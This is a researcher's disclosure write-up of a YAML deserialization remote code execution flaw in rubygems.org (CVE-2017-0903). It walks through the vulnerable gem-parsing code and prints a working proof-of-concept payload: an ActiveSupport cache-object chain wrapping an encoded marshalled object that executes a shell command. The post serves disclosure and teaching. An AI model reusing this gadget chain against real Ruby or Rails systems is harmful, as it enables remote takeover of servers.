Remote Code Execution on rubygems.org

tl;dr Remote code execution via a deserialization vulnerability on rubygems.org, a very popular hosting service for ruby dependencies. A fix was rolled out quickly. Read the official announcement here. CVE-2017-0903

If you have ever written a ruby application, it is very likely that you have interacted with rubygems.org. You’ve probably even trusted that site to run arbitrary programs on your computer. When you run, for example, gem install rails, the gem utility fetches the rails gem and all of its dependencies from rubygems.org, and installs everything into the appropriate places. Anyone can publish gems there after making an account.

Rubygems.org is itself a rails application with a clearly laid out responsible disclosure policy.

Vulnerability

Ruby gems are actually just tar archives, so running tar -xvf foo.gem will ordinarily leave you with three files:

metadata.gz
data.tar.gz
checksums.yaml.gz

These files are pretty much what they look like. All are gzipped. metadata.gz contains a YAML file with information about the gem like its name, author, version, and so on. data.tar.gz contains another tar archive with all the source code. checksums.yaml.gz contains a YAML file with some cryptographic hashes of the gem’s contents.

I was surprised to learn that parsing untrusted YAML is dangerous. I had always figured it was a benign interchange format like JSON. In fact, YAML allows for the encoding of arbitrary objects, much like python’s pickle.

When you upload a gem to rubygems.org, the application calls Gem::Package.new(body).spec. The rubygems gem, where this method lives, uses unsafe calls to YAML.load to load the YAML files in the gem.

However, the authors of rubygems.org knew this (probably as a result of this incident), and as of 2013 were monkey-patching the YAML and gem parsing libraries to only allow the deserialization of a whitelist of classes, eventually switching to using Psych.safe_load in 2015.

Unfortunately, the monkey-patching was insufficient, since it only patched the Gem::Specification#from_yaml method. If we check out what actually happens in that call to #spec, we see that it calls #verify, the important parts of which are reproduced below:

# ...
  @gem.with_read_io do |io|
    Gem::Package::TarReader.new io do |reader|
    read_checksums reader

    verify_files reader
    end
  end

  verify_checksums @digests, @checksums
# ...

Then, in #read_checksums:

# ...
  Gem.load_yaml

  @checksums = gem.seek 'checksums.yaml.gz' do |entry|
    Zlib::GzipReader.wrap entry do |gz_io|
      YAML.load gz_io.read # oops
    end
  end
# ...

OK, so we have a call to YAML.load with input that we control. How can we exploit it? Originally I attempted to have my exploit code run at the time of the YAML.load call itself. This turned out to be more challenging than I had anticipated, because although I could deserialize arbitrary objects, the only actual method calls I could make on those objects were very limited. Psych, the YAML parsing library used here, would let me make calls to methods like #[]=, #init_with, and #marshal_load (not Marshal.load; that would have made exploitation much easier). But for most objects, those methods don’t give an attacker much flexibility, since common practice is for them to just initialize a couple variables and return. It seems plausible that there is some object in some standard rails library with a dangerous #[]= method (as there have been in the past), but I didn’t find one.

Instead, I looked back at the rubygems.org application. What does it do with that @checksums variable, which we can now set to be an instance of any in-scope class? Over in #verify_checksums:

# ...
  checksums.sort.each do |algorithm, gem_digests|
    gem_digests.sort.each do |file_name, gem_hexdigest|
      computed_digest = digests[algorithm][file_name]
# ...

So if we can build an object where calling #sort does something dangerous, we can trigger our exploit. In the end, I came up with the following proof of concept. The payload that actually gets evaled is contained in the base-64 encoded, DEFLATE compressed, marshalled section at the bottom (in this case, it just shells out to run echo "oops"):

SHA1: !ruby/object:Gem::Package::TarReader
  io: !ruby/object:Gem::Package::TarReader::Entry
    closed: false
    header: 'foo'
    read: 0
    io: !ruby/object:ActiveSupport::Cache::MemoryStore
      options: {}
      monitor: !ruby/object:ActiveSupport::Cache::Strategy::LocalCache::LocalStore
        registry: {}
      key_access: {}
      data:
        '3': !ruby/object:ActiveSupport::Cache::Entry
          compressed: true
          value: !binary '\
          eJx1jrsKAjEQRbeQNT4QwQ9Q8hlTRXGL7UTFemMysIGYCZNZ0b/XYsHK8nIO\
          nDtRBGbvJDzxMuRMLABHzIzOSqD0G+jbVMQmhzfLwd4jnphebwUrE0ZAoJrz\
          YQpLE0PCRKGCmSnsWr3p0PW000S56G5eQ91cv9oDpScPC8YyRIG18WOMmGD7\
          /1X1AV+XPlQ='

Starting from the last step and working backwards to the call to #sort:

At the bottom we have an ActiveSupport::Cache::Entry object. The important thing about this object is that when the #value method is called and @compressed is true, it will call Marshal.load on DEFLATE compressed, attacker provided data. The object that is unmarshalled is constructed in such a way that calling just about any method on it will execute the attacker’s code. The exact method used here has been written about before – here is how it works. Unfortunately, we can’t just deserialize this object with YAML to achieve code execution, because it undefs almost all of its methods, including the ones that allow us to set instance variables. It really needs to be loaded with Marshal.load to be useful in this context.

Working our way up, the ActiveSupport::Cache::MemoryStore object holds our malicious unmarshalled object in a hash called @data. Its parent class, ActiveSupport::Cache::Store defines a #read method that calls #read_entry within the MemoryStore. #read_entry basically just grabs the entry out of @data and returns it.

The call to MemoryStore#read comes from a call to Gem::Package::TarReader::Entry#read, which itself is called by Gem::Package::TarReader#each. After the read returns, #size is called on the returned value, which our malicious unmarshalled object does not define, causing our payload to execute.

Finally, because Gem::Package::TarReader specifies include Enumerable, a call to its #sort method will call its #each method, starting the whole chain above.

Conclusion

For me, one of the takeaways here is that YAML is very powerful, and sometimes used in contexts where less expressive (but safer) interchange formats like JSON might be more appropriate. Perhaps in the future, YAML.load could be modified to take a whitelist of classes as an optional parameter, making the deserialization of complex objects an opt-in behavior. YAML.load in its current state should really be named something like YAML.unsafe_load to get the point across, instead of relying on users to know when they should use YAML.safe_load.

Thanks very much to the rubygems.org team for running a responsive bug bounty program.

Shameless plug

If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!